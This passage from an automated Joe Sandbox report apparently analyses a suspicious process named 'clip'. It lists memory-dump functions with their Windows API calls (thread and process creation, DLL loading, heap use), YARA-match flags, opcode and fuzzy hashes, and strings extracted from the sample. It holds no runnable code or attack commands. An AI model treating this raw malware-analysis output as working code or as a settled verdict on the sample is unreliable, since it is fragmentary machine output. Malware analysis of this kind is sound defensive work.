                                                  • Instruction Fuzzy Hash: B3900265602401426144716CC8449064005AFE6225755E121A49A9550D8559D9655665
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 78bbb73a322d33b7f05882c2b0736f7d2b3a005cbd0442d85c132de530144ecc
                                                  • Instruction ID: f36df4cec3cdccf98a32b96a993dd786822518b314e93c436f3b3e2807a4f3a4
                                                  • Opcode Fuzzy Hash: 78bbb73a322d33b7f05882c2b0736f7d2b3a005cbd0442d85c132de530144ecc
                                                  • Instruction Fuzzy Hash: D6900265212C0142F204756C8C14B0700058BD5317F55E115A4165554CC915D9615521
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8c1956380b0f5b172a01b2bd56723a5498722e0a91e8065f3a7c04e756a30b87
                                                  • Instruction ID: 36aae759d97292691264271fa51decf22360a179fabb058bfc35cd4420514230
                                                  • Opcode Fuzzy Hash: 8c1956380b0f5b172a01b2bd56723a5498722e0a91e8065f3a7c04e756a30b87
                                                  • Instruction Fuzzy Hash: 5290026524645202F154715C84046164005ABE5215F55E021A4825594D8555D9556221
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 493d599435f633711d509cbc541591c35389638a6e280c356d8617e1fe7f4abe
                                                  • Instruction ID: 9cbe98a154d6bb7edd90821ed526020cf1f2507bbc96d6d8d4f24861db3c0fd7
                                                  • Opcode Fuzzy Hash: 493d599435f633711d509cbc541591c35389638a6e280c356d8617e1fe7f4abe
                                                  • Instruction Fuzzy Hash: 0E900269222401022149B55C460450B04459BDB365395E015F5427590CC621D9655321
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 50d02c00d628865deeac6893203c1a6c4b4bc9d8c75cfceab040172f698b6a83
                                                  • Instruction ID: cd821d8956df493c9cf61c8f2c73364a756c6abe3c826e1dd857d8ed1b39a18a
                                                  • Opcode Fuzzy Hash: 50d02c00d628865deeac6893203c1a6c4b4bc9d8c75cfceab040172f698b6a83
                                                  • Instruction Fuzzy Hash: 48900269212401032109B55C470450700468BDA365355E021F5026550CD621D9615121
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6d122e45a83b1f916c925f9891ceed53d4a78386136db1baeb4a3de09ba723fd
                                                  • Instruction ID: e04dc23a368548d4ca2e3a403ed56be4d9770a2a6c829088ee4696e4c93349a9
                                                  • Opcode Fuzzy Hash: 6d122e45a83b1f916c925f9891ceed53d4a78386136db1baeb4a3de09ba723fd
                                                  • Instruction Fuzzy Hash: FA9002A5203401036109715C8414616400A8BE5215B55E021E5025590DC525D9916125
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 089f6d98868b1cced10ca4dc286a72724c77822e4e233e0746c3cd476035ee02
                                                  • Instruction ID: 60edb512b05e5e0e30396757dc8f00beb8ab6e45bc814f75363a164d5f2b5cd8
                                                  • Opcode Fuzzy Hash: 089f6d98868b1cced10ca4dc286a72724c77822e4e233e0746c3cd476035ee02
                                                  • Instruction Fuzzy Hash: 3790027560640902F154715C841474600058BD5315F55E011A4035654D8755DB5576A1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1a09dbb141a050297d516982d662738a53bb7c63840747ddd84ed9896e47d974
                                                  • Instruction ID: ae1eb622ec50b319a3c0a19f9c44bed10d09005361d7940195d2cf7a30bdd290
                                                  • Opcode Fuzzy Hash: 1a09dbb141a050297d516982d662738a53bb7c63840747ddd84ed9896e47d974
                                                  • Instruction Fuzzy Hash: B190027520240902F184715C840464A00058BD6315F95E015A4036654DCA15DB5977A1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ad2dc90f6f2fe888a9d190108528cc8413144c0d65789bbdf2686e3c1371271a
                                                  • Instruction ID: bb84fe8fb98b433ea45760e93adc2bf712758b6bfa8c273cf7fe545bbc97d384
                                                  • Opcode Fuzzy Hash: ad2dc90f6f2fe888a9d190108528cc8413144c0d65789bbdf2686e3c1371271a
                                                  • Instruction Fuzzy Hash: 8890027520644942F144715C8404A4600158BD5319F55E011A4075694D9625DE55B661
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 0-1269752229
                                                  • Opcode ID: 6cdc233e5b334642c318b4a0d004526adf7bdf7bc354204f0b511cbdaeb84197
                                                  • Instruction ID: 255d29c66e9b0ca0b01a78b1fae04a63d7c7667ef9f35612120dc5c25239c5d3
                                                  • Opcode Fuzzy Hash: 6cdc233e5b334642c318b4a0d004526adf7bdf7bc354204f0b511cbdaeb84197
                                                  • Instruction Fuzzy Hash: EE41637A286B419FC314DF74D894BDAFBA4FF99214F24816EE8994F202C3306142CBE0
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 021C263B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: ca8d93f097ec75e431b48be26b6283072f2a354db714deaccece93f77ec9943c
                                                  • Instruction ID: 34b42bd209db07b6608f978259f7e6a1a4a39a0f7ff18cd12c7ad211df33dd55
                                                  • Opcode Fuzzy Hash: ca8d93f097ec75e431b48be26b6283072f2a354db714deaccece93f77ec9943c
                                                  • Instruction Fuzzy Hash: 8A318BB5641704AFD718EF64C884FEBBBB9BF88704F20852DE9595B240D770BA44CBA0
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 021C263B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: 6bd7084c61c83b4215104f79c88f2449923c21c7ca8da17951dbf5585244490a
                                                  • Instruction ID: c75e55aebf35572c2f99101a323fcb03cbd7211d7a915e219ed8043425043e74
                                                  • Opcode Fuzzy Hash: 6bd7084c61c83b4215104f79c88f2449923c21c7ca8da17951dbf5585244490a
                                                  • Instruction Fuzzy Hash: 19319EB5641705AFD714EF64C884FEABBB9BF44304F20426CE9195B284D770AA84CFA4
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 021BE5F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID: @J7<
                                                  • API String ID: 2538663250-2016760708
                                                  • Opcode ID: d4e6611addd0f9f8418c97846134731f9b5d844e9a1d9d81c0a49716e279f921
                                                  • Instruction ID: d179ed0506e28372fbcc567b66d75e0f68ff41e211c4e40269339690f031e53b
                                                  • Opcode Fuzzy Hash: d4e6611addd0f9f8418c97846134731f9b5d844e9a1d9d81c0a49716e279f921
                                                  • Instruction Fuzzy Hash: D94152B6A002099FDB01DFE8D8809EEB7B9FF88304F508559E505EB214D771EA05CBA0
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 021BE5F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID: @J7<
                                                  • API String ID: 2538663250-2016760708
                                                  • Opcode ID: 595f1fdfb072edf3e0c29c22bea1e29437efa4cc9c58f6f00961146ae39bbc1c
                                                  • Instruction ID: 4433915d6f7b46b776134a0b6d03c3c2da5f49b4689513db84181dd582ea441d
                                                  • Opcode Fuzzy Hash: 595f1fdfb072edf3e0c29c22bea1e29437efa4cc9c58f6f00961146ae39bbc1c
                                                  • Instruction Fuzzy Hash: 67312FB5A0060AAFDB10DFE8C8809EFB7B9BF88304F508559E505EB214D775EE45CBA0
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 021B3E72
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 23ed66777d07d4a336a7e54069b82ee4196059ee8bce884f89ec61c0a8e4ac80
                                                  • Instruction ID: 4a5fff676d27a7a25668eb861536655bd939a58085d2f08b47e785dba3cc3ed5
                                                  • Opcode Fuzzy Hash: 23ed66777d07d4a336a7e54069b82ee4196059ee8bce884f89ec61c0a8e4ac80
                                                  • Instruction Fuzzy Hash: FE015EB9D4020DABDF11DAA0EC41FEEB3799F54308F104199E91897240FB31E7188B91
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(021B08D1,021B08F9,021B06D1,00000000,021B7703,00000010,021B08F9,?,?,00000044,021B08F9,00000010,021B7703,00000000,021B06D1,021B08F9), ref: 021C7E60
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 450cb9c7663112ca210b0cb6c60cfdfedc45c319147f1a5182a9a80414c57d4f
                                                  • Instruction ID: 6a3b5da0c483e546f31518a54e0618a1f088b8a8e897fd013f6acce8a6326432
                                                  • Opcode Fuzzy Hash: 450cb9c7663112ca210b0cb6c60cfdfedc45c319147f1a5182a9a80414c57d4f
                                                  • Instruction Fuzzy Hash: 75018CB6214509BFCB44DE99DC81EEB77AEAF8C754F518208BA1DE3240D670F8518BA4
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 021A9305
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: ec1d09ce3e54925c17ae98927fe2e42eff823d399e93492180d79b5bad6aeca9
                                                  • Instruction ID: ed9ae0cff67f351cfd1befa0a61d8baf505ba3970c562aec4e6f17c0dce8e079
                                                  • Opcode Fuzzy Hash: ec1d09ce3e54925c17ae98927fe2e42eff823d399e93492180d79b5bad6aeca9
                                                  • Instruction Fuzzy Hash: 5FF06D773C03043AE26066AA9C02FDBB79C8F94B65F240429F60CEB1C0DA92B54186E8
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 021A9305
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: a2c59b0a1cf75fd5b24ef5f1be27273fcecd08b71946c8df7c4b388ad9e25ceb
                                                  • Instruction ID: fd4ca616680971af946d65d1568f4df34804d825998330b8e958553a517a1621
                                                  • Opcode Fuzzy Hash: a2c59b0a1cf75fd5b24ef5f1be27273fcecd08b71946c8df7c4b388ad9e25ceb
                                                  • Instruction Fuzzy Hash: 86F0927B7C03143AD37066B98C02FDB67688F94B60F34051DF60DAB1C0DA92B5458AA8
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(021B1039,?,021C4793,021B1039,021C4087,021C4793,?,021B1039,021C4087,00001000,?,?,021C95CD), ref: 021C7D5C
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 504fe083870a0fa2096c11ce1490c744b46d51673e052a9510a6b519a7afd9aa
                                                  • Instruction ID: 7429e8c7d62b35457972278ce8c4d9eaf43686d583436ed4b5d46bba50cd09af
                                                  • Opcode Fuzzy Hash: 504fe083870a0fa2096c11ce1490c744b46d51673e052a9510a6b519a7afd9aa
                                                  • Instruction Fuzzy Hash: A0E032BA204204BFD614EA99DC85FDB77ADEF89710F004019BA08A7240D730B9108AB9
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8DF8458B,00000007,00000000,00000004,00000000,021B36E2,000000F4,?,?,?,?,?), ref: 021C7DAF
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 76aaf073e5ea89334c423fe6c257c7112881dff11aa88fd80e51c62d0fc7f01c
                                                  • Instruction ID: a050f708505138846349b4e6fb59c21021bd4aa62939295c0e1b405d0f754587
                                                  • Opcode Fuzzy Hash: 76aaf073e5ea89334c423fe6c257c7112881dff11aa88fd80e51c62d0fc7f01c
                                                  • Instruction Fuzzy Hash: 5CE065BA200204BFE610EF59DC81F9B77ADEFC9710F404418FA08A7240C730B8118EB8
                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111), ref: 021B0497
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                  • Instruction ID: 0a8fbc0610be5e89a6d2995522b72a60717e4f1aecd0e5d9b350c51023076a9f
                                                  • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                  • Instruction Fuzzy Hash: 73D0A967B4000C3AAA024584ACC1DFFB72CEB88AA6F0080A3FB08E2040E72189060AB0
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,021B1320,021C67A7,021C4087,?), ref: 021B7583
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,021B1320,021C67A7,021C4087,?), ref: 021B7583
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE ref: 021B776C
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Strings
                                                  • Address of the debug info found in the active list., xrefs: 043854AE, 043854FA
                                                  • 8, xrefs: 043852E3
                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 043854CE
                                                  • Critical section debug info address, xrefs: 0438541F, 0438552E
                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0438540A, 04385496, 04385519
                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 043854E2
                                                  • undeleted critical section in freed memory, xrefs: 0438542B
                                                  • Invalid debug info address of this critical section, xrefs: 043854B6
                                                  • Critical section address, xrefs: 04385425, 043854BC, 04385534
                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 04385543
                                                  • Critical section address., xrefs: 04385502
                                                  • double initialized or corrupted critical section, xrefs: 04385508
                                                  • Thread identifier, xrefs: 0438553A
                                                  • corrupted critical section, xrefs: 043854C2
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                  • API String ID: 0-2368682639
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                  • API String ID: 2994545307-3063724069
                                                  Strings
                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0430D262
                                                  • @, xrefs: 0430D0FD
                                                  • @, xrefs: 0430D313
                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 0430D196
                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0430D0CF
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0430D2C3
                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0430D146
                                                  • @, xrefs: 0430D2AF
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                  • API String ID: 0-1356375266
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-523794902
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                  • API String ID: 0-122214566
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
